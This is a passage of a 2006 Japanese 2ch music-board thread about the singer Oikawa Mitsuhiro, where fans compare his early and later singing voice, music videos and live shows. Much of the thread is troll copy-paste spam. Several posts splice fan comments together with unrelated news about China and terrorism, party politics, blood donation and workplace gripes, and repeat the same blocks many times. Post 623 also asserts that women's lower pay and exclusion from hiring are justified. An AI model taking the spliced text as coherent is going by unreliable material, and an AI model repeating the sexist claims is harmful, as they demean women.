 その上で「中国は上海協力機構(SCO)の枠組みに基づいて、ロシアや中央アジア諸国との間で
テロ撲滅に関する条約を締結した」「上海協力機構はテロとの戦いで成果をあげてきた」と主張した。
あの容貌と、声と、全体の雰囲気をして、歌が成り立っている事を
実感しました。

他人の血が汚らわしいんだからな。
信者同士が集まると、仲間であるのに
互いに汚らわしいと感じているんだろうな。

総合芸術といったところでしょうか?
舞台とか衣装も手がけているみたいだし、正直言えば生見てみたいですね。

辛いだけなら誰もしなくなると思う。趣味板に献血スレがある通り、
趣味で献血する人もいるくらいだから。

確かに針を刺すときは痛いけど、それはその時だけだからそんなに
辛くない。仕事をしているとせっかくの休みの日に時間を取られる方が
ずっと辛いと思うようになる。

表でガンガンキャピりまくって、モラリティや僕のゼリー、あるいは
ココロノヤミで、内部のネガティヴで毒のある歌を聴かせて、

霧の中でに男を見ると、どんな男もグッド・ルッキング・ガイに見える手法が
有るけれど、及川光博は、本物の好い男だから、その振り幅は大きくなると
思います。確かにあの人は麗人。男はどんなに嫉妬するだろうか。

基本理念では、現在の自民党の政治を「『扇動政治』が台頭している」と批判し、
「共生」「公正」の理念に基づき「常識の政治」を行うと宣言した。
そのせいで、思うような仕事が出来ていないんではなかろうか?

及川光博の、及川光博による総合芸術に触れることは、結構なラリだと思う。
もっと聴かせて欲しい。そして良いPVも期待する。
今年デヴュー10周年らしいけど、俳優や雑誌、ラジオ、様々なメディアで、
どれだけ多くの仕事をこなしてきたんだろう。どれだけ多くの人格やキャラクター
を演じて・・・そしてどれだけ多くのファンの心を掴んで煙に巻き、遠くから
まとまったのは組織票しか取れないという所が困る。というわけで今後は
小選挙区の完全実施を求める。あと一票の格差も一対一に是正すべき。
手招きしてきたんだろう。真の好い男のやり方。
もしかしたら小沢は選挙を経ずに、自民を分裂させ政界再編コース
で政権を奪取するかもしれん。いやその可能性が高い気がする。
雲をつかむような、あのもどかしさと夢。

謂わば「ケムに巻く」ようなやり方、及川さんの深淵と文字通り
心の闇を具間見せることで、魅力を増大させる効果があると思います。

622 :NO MUSIC NO NAME:2006/09/13(水) 00:07:04 ID:aSDWLhzl
┏(・з・)┛
何か寂しいのか?悩みがあるのか?何かが思い通りにならなくて。
イライラしてるのか?ここのスレが自分の意のままにならないから。
そんな事してるのか?面白い人だな。餌は何がいい?
話しようぜ。あんた何を話したい?
及川光博以外の話題でも良いから。悩みでも良いから。
何でも言ってみろ。
┏(・з・)┛ヘヘッ
結構爽快だよベイベ

623 :NO MUSIC NO NAME:2006/09/13(水) 00:15:50 ID:1NQMtc0i
歌手としての及川光博は、影の一流としておきたい気持ちがあるのは、
独占欲が強いからか?外資は男女平等だと考えて求職に行き、
そこでは女の優遇がないことに気がつく馬鹿な女がいるらしい。
日本の女にとって女の優遇が男女平等なのだろう。
あのような動員をして熱狂せしめる人物は及川光博において他には
残念ながらこの日本においては居ないと。私は思う。
産休、育児休暇、生理休暇をとる効率の悪い労働は採用されなくてもしかたがない。

及川光博の、及川光博による総合芸術に触れることは、結構なラリだと思う。
もっと聴かせて欲しい。そして良いPVも期待する。
それは差別でなく、経済活動である。
生のライブの空間さえあれば他には何も要らないって言っても過言じゃない。
優秀な女がいるのは事実であって優秀な経営者も存在するが、
彼女らは積極的に女を採用しようとはしない。
このことが全てを語っている。
ミチーが、生のライブを一番大事にしてくれる歌手で良かったと思う。(その辺 >>569と同感)
もともと優秀な女は優遇を求めない。
なぜなら、優遇されて高い地位についたと思われるからである。
それは屈辱でしかない。

一流大学、理工系、経済学部、法学部は圧倒的に女が少ない。
平均で見たとき、女が男性より低賃金は当たり前。

実際はこんなものに何の価値も無い。何故なら他人と協調された価値観の集合
が世間の風潮だからな。己の価値観で価値があると断言できるのは、己自身だ
け。周りには何の影響も与えない。
それがXTC。まさしく狂乱の精神を私たちに植え付け、個々の中にマルティプライズ
させうる能力が、彼にはある。

624 :NO MUSIC NO NAME:2006/09/13(水) 03:03:56 ID:N0dQtj+E
嵐扱いされてるな。悲しい。
及川光博のファンってこんなんばっかりか?
自由に2ちゃんで話もできない。
これもコピペされて汚されるんだろうけど。
及川光博なぞ、聴くのではなかった。

以上糸冬 了..._〆(゚▽゚*) 
もう何もない。

股来るかもしれないけど。
しばらく見てます。
   

   -=・=-     -=・=- 

迷惑かけた方々。本当にごめん。
もういや。

625 :NO MUSIC NO NAME:2006/09/13(水) 03:28:01 ID:vvl6OYcr
自由な話には自由な感想も付いてくる、ただそれだけのこと。

たとえ不快に感じる人があろうと自分は自由に語りまくるが、
それに対し思うところを自由に述べられるのは
自分が不快だからいけないというなら
これほど自由な掲示板に向かないものはない。

626 :NO MUSIC NO NAME:2006/09/13(水) 03:29:09 ID:gVmjgXzl
>>624
2ちゃんにいるベイベはみちーのファンの中のほんの一握り。
そしてあなたの独特のレスを快く思ってない人はその中のまた一握り。
人数が大きくなれば、いろんな人が集まってくるもの。
でもそれとミチーとは関係ないよね。

ちょっとアドバイスすると
1レスの長さを短くするとか、もう少しわかりやすく書くとか(これは好みだね)
すればいいかもしれない。
あまりに熱い長文レスがたくさんついてると前のレスが流れてしまうし、
途中から話に加わりにくいから。

627 :NO MUSIC NO NAME:2006/09/13(水) 03:35:37 ID:m0p4sdF3
独特の語彙と口調で悠然と構えてる大人を装った風だったけど、
結局はリア厨構ってちゃんが注意された時お決まりの
「ふ〜ん、ここのファンってみんなこんなヤシばっかりなんだ」
「みんなのせいで、せっかく好きだった誰々のことも嫌いになった」
って捨て台詞ですか。がっかりだよ。

628 :NO MUSIC NO NAME:2006/09/13(水) 03:56:19 ID:N0dQtj+E
ごめん。大人気なかった。詫びる。
非常に凹んだのは確かだし、皆に迷惑をかけて自分にがっかりした。
今一端落としたんだけど変な終わり方になり。
気分が悪く、本当に身の置き所のないような不安感があって。
また立ち上げた次第。

>>625-626さn 
分りました。一応長い2ちゃん生活でこんな状態は見たことがなかった。
及川光博関連スレをのぞく様になったとき。どこかで、凄く荒されてた。
どこか不明になってしまったけど。
あんな事書いたにも係わらず。暖かな言葉ありがとう。
これどんなに救われる事か。ありがとう。感謝します。

>>627さn
ごめん。色々私情ノイズもあった。個人的に色々とリアルで。
少し言い過ぎた。もう取り消しは効かないが。
今冷静さを取り戻した。
やっぱり。及川光博は好きだ。。。


629 :606:2006/09/13(水) 08:43:51 ID:2UrR3u7K
>>628
そんなに謝らなくていいよ。

最後の1行で安心した。
気が向いたらほんとにライヴに来てみてください。
もちろん、どこかで会うときは他人だけど。(て、金井克子じゃない方ねw)

630 :NO MUSIC NO NAME:2006/09/13(水) 22:34:05 ID:xnWEFIlk
ヤサシス。*゚・.+:゚。*。(つД`)* 
ありがとう。
実はリヴでWinAntiVirus Pro 2006踏んじまって。
踏んだというか。個人HPで勝手にインスコしてきて感染。
ベイベ達も気をつけてね。ようつべにもあるから。
これ最悪だ。PCの奥の奥まで入ってやがる。
それでぅぉぉぉぉぉぉーーーーーーーーーーってなったんだ。
リヴやってるなんて可愛いな漏れチャソ。及川光博もやってたりして。

どうだ。
6年目にして初めてだが。
ウィルスに感染するなんて。
私厨房だろ?しかも昨日今日で現れるなんて。
厨房杉てワロヌだゎ自分でも。


631 :NO MUSIC NO NAME:2006/09/13(水) 22:38:53 ID:xnWEFIlk
夢見るアンディさん
おっさんですかシャアですかおほほほほへい! 
って及川光博って、ガンヲタか?


632 :NO MUSIC NO NAME:2006/09/13(水) 23:01:50 ID:xnWEFIlk
及川光博の。
丁度今限定で。


リクエストジャックでもしますか?
はい
いいえ


633 :NO MUSIC NO NAME:2006/09/13(水) 23:19:30 ID:xnWEFIlk
あくまでも私は。だが。
初期の頃の及川光博の声のほうが好きだ。
なんか完成され尽くされていなくて危ういところが。
よーく聴いてしまう。

634 :NO MUSIC NO NAME:2006/09/13(水) 23:51:01 ID:Fqyh+6ca
>>633
おかえりなさいw

私も好みだけなら初期の声のが好きです。
今現在の逞しさと力強さに満ちた歌声はもちろん素晴らしいけど
昔の声はなんというか、胸がきゅーっとする感じになる。
余裕の無さに、ある意味萌えてしまいますw

635 :NO MUSIC NO NAME:2006/09/14(木) 00:26:15 ID:0znWovjs
>>628
長い2ちゃん歴のわりには長文好きだなw


636 :NO MUSIC NO NAME:2006/09/14(木) 01:14:05 ID:QcpLxV4O
句読点の使い方が妙でムズムズする。
文章の内容もともかく表現の仕方がどうしたものか。
イッちゃってる人?
正直怖いよ

637 :NO MUSIC NO NAME:2006/09/14(木) 02:46:27 ID:526U6rH6
確実に、ある時期から声質が変わったよね。
どっちも好きだけど。
初期の頃の声は… まあ、アレだ、好きになった瞬間の、
初発のインパクトだから自分も胸キュンするかな確かに。
(不思議なのは、今のほうが歌声としては
断然パワフルで逞しいし声量も声域も広がってるはずなのに)
何故かしらデビュー当時の声(特に低音?)のほうに、
より男っぽさを感じる。男ぽさちゅーか、男くささか?……フシギだ・・・)


638 :NO MUSIC NO NAME:2006/09/14(木) 02:54:59 ID:76ROaDTv
あの。
咽ぶような喉につかえたようなかすれたキャンプな絶叫とか好きだ。
デビューした頃のフィオナ・アップルみたいに。
危うい歌い方に似ておい。大丈夫か?とハラハラさせられるところがいい。
自分で決められた音をただ歌うんじゃなくて。
話をしている感じでファルセットとかもハスキーで好きだ。

639 :NO MUSIC NO NAME:2006/09/14(木) 02:56:50 ID:76ROaDTv
それが魅力的で、聞き入っちゃうのな。
詩とかも口語調で作られすぎていないところがまたいい。

640 :NO MUSIC NO NAME:2006/09/14(木) 02:58:29 ID:76ROaDTv
>>635さn
長文で読みたくない人は飛ばしてくれるかと。

641 :NO MUSIC NO NAME:2006/09/14(木) 03:15:10 ID:UYEgHVNp
>何故かしらデビュー当時の声(特に低音?)のほうに、
より男っぽさを感じる。

って私もそうだ。あれ本当に不思議。
逞しい今の声より雄の匂いが強いというか…
しかもなんか、ムショーにエロいんだよな、初期の声。
今の声にはエロは感じない。
初期ミチーボイスのあの雄の匂いとエロさはどっから生まれるんだろー?

642 :NO MUSIC NO NAME:2006/09/14(木) 03:15:18 ID:526U6rH6
かすれたキャンプな絶叫ね・・・
そらやっぱLIVE観て欲しいわ。
生じゃなく映像でもいーから。
そういう時は、声だけじゃなく、顔もイイ表情してるだよ。


643 :NO MUSIC NO NAME:2006/09/14(木) 03:17:20 ID:526U6rH6
>>641 声だけで言ったら、今の方が中性的な気がするよね。
まったくもって不思議だ。反比例だよ。本人の変化と。

644 :NO MUSIC NO NAME:2006/09/14(木) 03:17:43 ID:76ROaDTv
まあこうして希望に応じてみぢかくすると。

連 投 ウ ザ ス

ってなるだろうが?
話読む気概ある人だけ読んでヌルーしてくれたまい。
そんなに語っても語っても語りつくせないんだ。
なんでこんなに魅力的?なんで

日本語で直に歌詞が耳に入ってくるのははじめ凄くこそばゆい感じがした。
でも
及川光博の歌詞は不快ではないのだ。
不思議と。

645 :NO MUSIC NO NAME:2006/09/14(木) 03:18:29 ID:Y0NqLgcD
初期の方がクセが少なくて声がクリアな感じ
それって煙草やお酒の影響も少なからず関係してるのかな

だけど今の方が声量はもちろん厚みや温かみが断然アップしてるね

646 :NO MUSIC NO NAME:2006/09/14(木) 03:24:39 ID:76ROaDTv
そうそう低音ね。
ささやくような張り付くような低音良い。
今の及川は凄く抑えているみたいで痛々しい感じすらする。
もっとこう。大変だーたいへんだー!助けてくれ!
っていうスリリングが欲しい。
1日だけ聴かないと禁断症状出るんだな。
ベイベたちもそうかい?
静かに低音で始まってあるときから切望の叫びに変わる。
懇願しているようにも聞こえてエロヌさ倍増。

647 :NO MUSIC NO NAME:2006/09/14(木) 03:25:53 ID:UYEgHVNp
>>643
うん。
実はさっきちょっと昔のライブ映像を観てたんだけど
やっぱり今より男臭かった。低い声は特に。
今と声の出し方全然違うねぇ。
いつごろから今みたいになったっけなぁ。

648 :NO MUSIC NO NAME:2006/09/14(木) 03:29:36 ID:76ROaDTv
>>645さn
私は逆に初期の頃のほうが酒で喉がやられている感じがする。
言っておくが煽りじゃないから。いちいち煽りじゃないからとか('A`)マンドクセけど一応。
キャンプな。荒々しく拍車で馬を蹴って顔に埃がついても優美な感じ。

最近の声はドラマティック。厚みや温かさがある。これ言えてる。

649 :NO MUSIC NO NAME:2006/09/14(木) 03:30:56 ID:UYEgHVNp
>>646
>ささやくような張り付くような低音

そう!なんだよぅぅ!まさにそこがエロw
1日だけ聴かないと禁断症状って、10年前の自分だw

650 :NO MUSIC NO NAME:2006/09/14(木) 03:35:24 ID:UYEgHVNp
>>648
最近の声がドラマティックなのはやはり表現力が豊になったからかな?
ミチー自身、歌うにあたって表現力は最重要視してるしね。

651 :NO MUSIC NO NAME:2006/09/14(木) 03:36:29 ID:526U6rH6
>>646
>大変だーたいへんだー!助けてくれ!
っていうスリリング

いやはや何度もしつこくて申し訳ないんだが
それ、ライヴだとドンピシャなんだがなぁ。。。


652 :NO MUSIC NO NAME:2006/09/14(木) 09:59:37 ID:dcvaFq2x
歌い方変わったのってパズルからだった。
私は晴れここではまって、それからそれまでの聞きさくり、
その後でパズルの欠片が出るって言うんで楽しみにしてたら
歌い方変わってるんで、かなりがっかりしたの覚えてるよ。

昔の声、歌い方好きだった・・・
あのねっとりとした歌い方と、エロ指数の高い低音良かったなぁ。
ベイベに三日月聞いたときは気持ち悪いとしか思わなかったのに。

653 :NO MUSIC NO NAME:2006/09/14(木) 10:00:56 ID:dcvaFq2x
間違えた
ベイベに三日月→ベイベになる前に三日月

654 :NO MUSIC NO NAME:2006/09/14(木) 11:43:15 ID:gSWF33rK
パズル前後を境に顔も体つきも声も変わった。
いろいろ抱え込んで引きこもってたのはもうちょっと前だから
それとはあんまり関係ないね。
ツアーでいうと「誰にも…」から明らかに変わった。
その前のニヒルマンが映像化されてないから比べにくいけど
その直前のリスペクトのステージとは明らかに違うから
その後数ヶ月後で変化したらしい。
ドラマでいうと「晴れここ」と「おやじぃ」の間か。

655 :NO MUSIC NO NAME:2006/09/14(木) 15:21:13 ID:aV/xRGfO
連 投 ウ ザ ス

ってなるだろうが?
話読む気概ある人だけ読んでヌルーしてくれたまい。
そんなに語っても語っても語りつくせないんだ。
なんでこんなに魅力的?なんで

日本語で直に歌詞が耳に入ってくるのははじめ凄くこそばゆい感じがした。
でも
及川光博の歌詞は不快ではないのだ。
不思議と。

656 :NO MUSIC NO NAME:2006/09/14(木) 15:21:54 ID:aV/xRGfO
咽ぶような喉につかえたようなかすれたキャンプな絶叫とか好きだ。
デビューした頃のフィオナ・アップルみたいに。
危うい歌い方に似ておい。大丈夫か?とハラハラさせられるところがいい。
自分で決められた音をただ歌うんじゃなくて。
話をしている感じでファルセットとかもハスキーで好きだ。

657 :NO MUSIC NO NAME:2006/09/14(木) 15:22:51 ID:ujK2KDFx
及川光博のファンってこんなんばっかりか?
自由に2ちゃんで話もできない。
これもコピペされて汚されるんだろうけど。
及川光博なぞ、聴くのではなかった。

以上糸冬 了..._〆(゚▽゚*) 
もう何もない。

658 :NO MUSIC NO NAME:2006/09/14(木) 15:23:23 ID:aV/xRGfO





以上糸冬 了..._〆(゚▽゚*) 
もう何もない。






659 :NO MUSIC NO NAME:2006/09/14(木) 15:24:16 ID:SHo29w1x















以上糸冬 了..._〆(゚▽゚*) 
もう何もない。









































以上糸冬 了..._〆(゚▽゚*) 
もう何もない。

660 :NO MUSIC NO NAME:2006/09/14(木) 15:24:46 ID:aV/xRGfO
独特の語彙と口調で悠然と構えてる大人を装った風だったけど、
結局はリア厨構ってちゃんが注意された時お決まりの
「ふ〜ん、ここのファンってみんなこんなヤシばっかりなんだ」
「みんなのせいで、せっかく好きだった誰々のことも嫌いになった」
って捨て台詞ですか。がっかりだよ。

661 :NO MUSIC NO NAME:2006/09/14(木) 15:25:44 ID:XYF++Dvv


┏(・з・)┛
何か寂しいのか?悩みがあるのか?何かが思い通りにならなくて。
イライラしてるのか?ここのスレが自分の意のままにならないから。
そんな事してるのか?面白い人だな。餌は何がいい?
話しようぜ。あんた何を話したい?
及川光博以外の話題でも良いから。悩みでも良いから。
何でも言ってみろ。
┏(・з・)┛ヘヘッ
結構爽快だよベイベ

662 :NO MUSIC NO NAME:2006/09/14(木) 15:27:06 ID:DvKNQ+hr
及川光博のファンってこんなんばっかりか?
自由に2ちゃんで話もできない。
これもコピペされて汚されるんだろうけど。
及川光博なぞ、聴くのではなかった。

以上糸冬 了..._〆(゚▽゚*) 
もう何もない。

663 :NO MUSIC NO NAME:2006/09/14(木) 15:27:47 ID:aV/xRGfO
及川光博のファンってこんなんばっかりか?
自由に2ちゃんで話もできない。
これもコピペされて汚されるんだろうけど。
及川光博なぞ、聴くのではなかった。

以上糸冬 了..._〆(゚▽゚*) 
もう何もない。

664 :NO MUSIC NO NAME:2006/09/14(木) 22:38:33 ID:Jcuq5lpv







ま  た  お  ま  え  か









665 :NO MUSIC NO NAME:2006/09/14(木) 23:01:18 ID:blB0ZoFk







ま  た  お  ま  え  か









666 :NO MUSIC NO NAME:2006/09/15(金) 02:49:04 ID:iH63bFec
あたし、及川光博ってイチゴみたいだと思うの。
イチゴには、もうあたし。目がなくってね。でも、及川光博って、それと同時に、
信じられないぐらい恐いあのパラノイアがついてまわるでしょ・・・
あれって人間を狂わせるわね。あたしなんか、まぢかに見てビックリしちゃったもん・・・
話のついでだけどさ、あなた、あたしの毛皮の話、聞いたことある?
みんなで着てたの。

667 :NO MUSIC NO NAME:2006/09/15(金) 03:02:16 ID:iH63bFec
ナイスガイ・オヴ・ザ・イヤーとか、スーパースターとか、及川光博って、いろいろとそういう
ツマラナイものの全部だったわけじゃない?そういうのを及川光博がしたというのは・・・
及川光博がやったことって、みんな、ホント、隠れた動機があってのことだったのね。
たぶん、心理学的な不安から来てたと思うけど。及川光博は、自分がすごく美男子だとか、
神様からそんなにお恵みを受けたとか、たぶん、自分じゃ思わなかったからさ、
自分の顔を仮面にしちゃったのね。
まるでもうメチャクチャにしちゃったの。
だから、ああいういろんな小細工みたいなことをしてみたわけ。
とにかく肉体的に変身、フリークアウトしようとしたのね。
それが、何ていうか、アタマをオカシクしちゃったのね。
だから、別に・・・それでちょっとの間、メチャクチャやってみたくなったの。
健全な若い人たちの及川光博中毒の、ベイベ達はそのはしりだったのよ。

668 :NO MUSIC NO NAME:2006/09/15(金) 03:03:17 ID:iH63bFec
僕はスター
星だよ

669 :NO MUSIC NO NAME:2006/09/15(金) 03:04:01 ID:iH63bFec
スーパースター。
ファクトリーで出来た言葉だわ。

670 :NO MUSIC NO NAME:2006/09/15(金) 05:25:11 ID:1iEHhK0x
ナイスガイ・オヴ・ザ・イヤーとか、スーパースターとか、及川光博って、いろいろとそういう
ツマラナイものの全部だったわけじゃない?そういうのを及川光博がしたというのは・・・
及川光博がやったことって、みんな、ホント、隠れた動機があってのことだったのね。
たぶん、心理学的な不安から来てたと思うけど。及川光博は、自分がすごく美男子だとか、
神様からそんなにお恵みを受けたとか、たぶん、自分じゃ思わなかったからさ、
自分の顔を仮面にしちゃったのね。
まるでもうメチャクチャにしちゃったの。
だから、ああいういろんな小細工みたいなことをしてみたわけ。
とにかく肉体的に変身、フリークアウトしようとしたのね。
それが、何ていうか、アタマをオカシクしちゃったのね。
だから、別に・・・それでちょっとの間、メチャクチャやってみたくなったの。
健全な若い人たちの及川光博中毒の、ベイベ達はそのはしりだったのよ。

671 :NO MUSIC NO NAME:2006/09/15(金) 05:25:46 ID:1iEHhK0x
あたし、及川光博ってイチゴみたいだと思うの。
イチゴには、もうあたし。目がなくってね。でも、及川光博って、それと同時に、
信じられないぐらい恐いあのパラノイアがついてまわるでしょ・・・
あれって人間を狂わせるわね。あたしなんか、まぢかに見てビックリしちゃったもん・・・
話のついでだけどさ、あなた、あたしの毛皮の話、聞いたことある?
みんなで着てたの。






以上糸冬 了..._〆(゚▽゚*) 
もう何もない。

672 :NO MUSIC NO NAME:2006/09/15(金) 05:29:13 ID:vIVni92F
>>617
CDをヴォカールキャンセルして聞くと、音楽が浮きまくりますね。
やっぱり、及川光博というアーティストは、
 一方で「中国も東トルキスタン独立運動などテロの脅威に直面してきたので、9・11以降、国際的な
テロ撲滅活動に積極的に参加してきた」と述べた。
 その上で「中国は上海協力機構(SCO)の枠組みに基づいて、ロシアや中央アジア諸国との間で
テロ撲滅に関する条約を締結した」「上海協力機構はテロとの戦いで成果をあげてきた」と主張した。
あの容貌と、声と、全体の雰囲気をして、歌が成り立っている事を
実感しました。

他人の血が汚らわしいんだからな。
信者同士が集まると、仲間であるのに
互いに汚らわしいと感じているんだろうな。

総合芸術といったところでしょうか?
舞台とか衣装も手がけているみたいだし、正直言えば生見てみたいですね。

辛いだけなら誰もしなくなると思う。趣味板に献血スレがある通り、
趣味で献血する人もいるくらいだから。

確かに針を刺すときは痛いけど、それはその時だけだからそんなに
辛くない。仕事をしているとせっかくの休みの日に時間を取られる方が
ずっと辛いと思うようになる。

表でガンガンキャピりまくって、モラリティや僕のゼリー、あるいは
ココロノヤミで、内部のネガティヴで毒のある歌を聴かせて、

霧の中でに男を見ると、どんな男もグッド・ルッキング・ガイに見える手法が
有るけれど、及川光博は、本物の好い男だから、その振り幅は大きくなると
思います。確かにあの人は麗人。男はどんなに嫉妬するだろうか。

基本理念では、現在の自民党の政治を「『扇動政治』が台頭している」と批判し、
「共生」「公正」の理念に基づき「常識の政治」を行うと宣言した。
そのせいで、思うような仕事が出来ていないんではなかろうか?

及川光博の、及川光博による総合芸術に触れることは、結構なラリだと思う。
もっと聴かせて欲しい。そして良いPVも期待する。
今年デヴュー10周年らしいけど、俳優や雑誌、ラジオ、様々なメディアで、
どれだけ多くの仕事をこなしてきたんだろう。どれだけ多くの人格やキャラクター
を演じて・・・そしてどれだけ多くのファンの心を掴んで煙に巻き、遠くから
まとまったのは組織票しか取れないという所が困る。というわけで今後は
小選挙区の完全実施を求める。あと一票の格差も一対一に是正すべき。
手招きしてきたんだろう。真の好い男のやり方。
もしかしたら小沢は選挙を経ずに、自民を分裂させ政界再編コース
で政権を奪取するかもしれん。いやその可能性が高い気がする。
雲をつかむような、あのもどかしさと夢。

謂わば「ケムに巻く」ようなやり方、及川さんの深淵と文字通り
心の闇を具間見せることで、魅力を増大させる効果があると思います。

673 :NO MUSIC NO NAME:2006/09/15(金) 05:29:59 ID:vIVni92F
あたし、及川光博ってイチゴみたいだと思うの。
イチゴには、もうあたし。目がなくってね。でも、及川光博って、それと同時に、
信じられないぐらい恐いあのパラノイアがついてまわるでしょ・・・
あれって人間を狂わせるわね。あたしなんか、まぢかに見てビックリしちゃったもん・・・
話のついでだけどさ、あなた、あたしの毛皮の話、聞いたことある?
みんなで着てたの。


僕はスター
星だよ


スーパースター。
ファクトリーで出来た言葉だわ。

674 :NO MUSIC NO NAME:2006/09/15(金) 10:54:57 ID:cAjIBQYW
僕はイチゴじゃない!

675 :NO MUSIC NO NAME:2006/09/15(金) 22:46:51 ID:n3JIHiUS
思う壺w

676 :NO MUSIC NO NAME:2006/09/15(金) 22:47:33 ID:n3JIHiUS
こう単純だと逆に扱いやすいな。

677 :NO MUSIC NO NAME:2006/09/15(金) 22:54:27 ID:LNL309o+
>>676
ナイスガイ・オヴ・ザ・イヤーとか、スーパースターとか、及川光博って、いろいろとそういう
ツマラナイものの全部だったわけじゃない?そういうのを及川光博がしたというのは・・・
及川光博がやったことって、みんな、ホント、隠れた動機があってのことだったのね。
たぶん、心理学的な不安から来てたと思うけど。及川光博は、自分がすごく美男子だとか、
神様からそんなにお恵みを受けたとか、たぶん、自分じゃ思わなかったからさ、
自分の顔を仮面にしちゃったのね。
まるでもうメチャクチャにしちゃったの。
だから、ああいういろんな小細工みたいなことをしてみたわけ。
とにかく肉体的に変身、フリークアウトしようとしたのね。
それが、何ていうか、アタマをオカシクしちゃったのね。
だから、別に・・・それでちょっとの間、メチャクチャやってみたくなったの。
健全な若い人たちの及川光博中毒の、ベイベ達はそのはしりだったのよ。

678 :NO MUSIC NO NAME:2006/09/15(金) 22:57:34 ID:/gBXtDPs
こう単純だと逆に扱いやすいな。

(´・ω・`) ?

思う壺w

(´・ω・`) ?

679 :NO MUSIC NO NAME:2006/09/15(金) 23:07:22 ID:Gh2yi/0n
今の及川は凄く抑えているみたいで痛々しい感じすらする。
及川光博って、いろいろとそういう自分のやり方をすごく押し付ける人なの。
営業センスも指導力も関係ない・・・だから新人ちゃんたちが文句いうのよね。
いつ辞めるかわからないら物品買えない。なんとか、会社からもらったもので今は
まかなってるツマラナイものの全部だったわけじゃない?そういうのを及川光博がしたというのは・・・
及川光博がやったことって、みんな、ホント、隠れた動機があってのことだったのね。
たぶん、心理学的な不安から来てたと思うけど。及川光博は、自分がすごく美男子だとか、
神様からそんなにお恵みを受けたとか、たぶん、自分じゃ思わなかったからさ、
自分の顔を仮面にしちゃったのね。確かに4回目査定が終わった時点で同期の数が1/3になっていました。
まるでもうメチャクチャにしちゃったの。
だから、ああいういろんな小細工みたいなことをしてみたわけ。
物事には割り切りが必要だからね。上に取り入るのは上手いけど、部下からは評価されない。
今まで2回ほど退社願いだしたけど、却下されました。

とにかく肉体的に変身、フリークアウトしようとしたのね。
それが、何ていうか、アタマをオカシクしちゃったのね。
だから、別に・・・それでちょっとの間、メチャクチャやってみたくなったの。
小姑うるさいよね。何もしないならほっといてくれと思う

健全な若い人たちの及川光博中毒の、ベイベ達はそのはしりだったのよ。
日常茶飯事。悪循環だよね。
精神的にしんどいですね…。及川光博なぞ、聴くのではなかった。

以上糸冬 了..._〆(゚▽゚*) 
もう何もない。

680 :NO MUSIC NO NAME:2006/09/15(金) 23:10:01 ID:n3JIHiUS
おお。スキルうpしてるw
自然に見えるぞ!乙だね。
まとめてくれてまり乙。


681 :NO MUSIC NO NAME:2006/09/15(金) 23:10:50 ID:n3JIHiUS
let yourself go! go!


682 :NO MUSIC NO NAME:2006/09/15(金) 23:12:44 ID:n3JIHiUS
僕は光


683 :NO MUSIC NO NAME:2006/09/15(金) 23:14:32 ID:ANDdqzmh
et yourself go! go!

僕は光、僕はイチゴ

684 :NO MUSIC NO NAME:2006/09/15(金) 23:15:27 ID:ngXWVq2b
>>680
おお。スキルうpしてるw
自然に見えるぞ!乙だね。
まとめてくれてまり乙。

685 :NO MUSIC NO NAME:2006/09/15(金) 23:17:08 ID:ngXWVq2b
>>683 そうですか・・あんなもんでしたか。
期待してました正直。部屋に飾れるような何かが入ってると思ったら、
すんごい小さい写真だけっておい!!!ってなったけど、
東芝は色々と良くしてくれてるとは思う。

よく見たら、監督とかいつも決まってるわけじゃなくて、
意思の疎通とか大変だっただろうなとか思った。

奇をてらって、人を出し抜いて欺く・・そして踊るベイベを尻目にほくそえんでいる>良い意味で
それって凄い自己演出だと思うし、イマジネーションの結実だと思う。
山登りに行って、「頂上はまだー?」とか聞いて「もう少しだよ」
って、何度もはぐらかされるような感じがした。
特に若い頃の及川光博は、可愛く美しいだけでなく、ある種の毒を含んでいて、
影的なものもあって魅力的だった。セックルアピールもゆんゆんで。
そういう意味で、僕のゼリーって言うのを見てからレッツ・ダンスとか見ると、
意味深長に思える。

昨日あれからPV見たんだけど、
一番出来が良いのはやっぱり舞台や服飾にこだわった
三日月姫じゃないかなと思う。

ただ、音楽の完成度としてはイマイチな気がします。
及川光博自体何か楽器が出来るとかそういうニュアンスが伝わっては来なかった。
PVは及川光博自体が魅力的で良いけど、曲自体は、人の手が加わりすぎの
きらいがあるように感じました。最近及川さんは、新譜出しませんね。
EMI離れたら、良いプロデューサーやスタ・ミュージシャンから離れてしまったから?
それとも音楽からは足を・・・・?
ミチーの楽曲に、ある意味での「完成度」を求めるなら
ライブ映像を見る(もしくはライブCDを聞く)のをおすすめします。
生でこそ、という部分がこんなにも強いアーティストって
非常に特異な存在だとは思うけど…
なんともPVやCDだけでは真の魅力が100%伝わりにくいので。
ミチーの本領は、やっぱり生(なま)にあり!です。
そうですか・・・なんか気が引けてしまいます。
生も良いけど、映像とかに加工されつくしたPVなどの音楽が好きです自分は。
生を否定はしないけど、自分は、ね。

及川光博ヘヴィ・フリークでない私が、色々生意気言ってすみません、
私は主に洋楽のPVを網羅している人間で、
邦楽のPVでこれだけの魅せるPVや画になる人物は、
及川光博以外にこの日本には魅力的な人物は居ない

なんか、この「及川光博の世界」って、年がランダムだから、
並べ替えしてみたら、
少しトーンダウンする時期があったようですね。
何があったんだろう。
なんか、この「及川光博の世界」って、年がランダムだから、
並べ替えしてみたら、
少しトーンダウンする時期があったようですね。
何があったんだろう。

686 :NO MUSIC NO NAME:2006/09/15(金) 23:18:50 ID:Rc43JcIY
>>685
ここで、例の知ったかクンは何をとち狂ったか、
そもそもの脂肪燃焼促進効果が無いと言い切っていることに注意したい。
生理学的作動原理そのものも否定したのだ。

否定しているもののその実、その根拠はなんら示していない。
また十分調査も実はしていないのに、堂々と否定している。
しかも、運動能力向上は認めるといっておきながら、
それが何によってもたらされているのかを考えず、
脂肪燃焼効果はないと主張する自らの矛盾に気づかないようだ。

20代なら未熟、30代ならがんばれ、40代ならちょっとやばいぞ。

非常に単純に考えると、
疲れにくいという事は、運動の際にグリコーゲンを温存しつつ、
脂肪酸エネルギーをうまく使えているという事。

687 :NO MUSIC NO NAME:2006/09/15(金) 23:20:33 ID:asElTpPG
>>685
CDをヴォカールキャンセルして聞くと、音楽が浮きまくりますね。
やっぱり、及川光博というアーティストは、
 一方で「中国も東トルキスタン独立運動などテロの脅威に直面してきたので、9・11以降、国際的な
テロ撲滅活動に積極的に参加してきた」と述べた。
 その上で「中国は上海協力機構(SCO)の枠組みに基づいて、ロシアや中央アジア諸国との間で
テロ撲滅に関する条約を締結した」「上海協力機構はテロとの戦いで成果をあげてきた」と主張した。
あの容貌と、声と、全体の雰囲気をして、歌が成り立っている事を
実感しました。

他人の血が汚らわしいんだからな。
信者同士が集まると、仲間であるのに
互いに汚らわしいと感じているんだろうな。

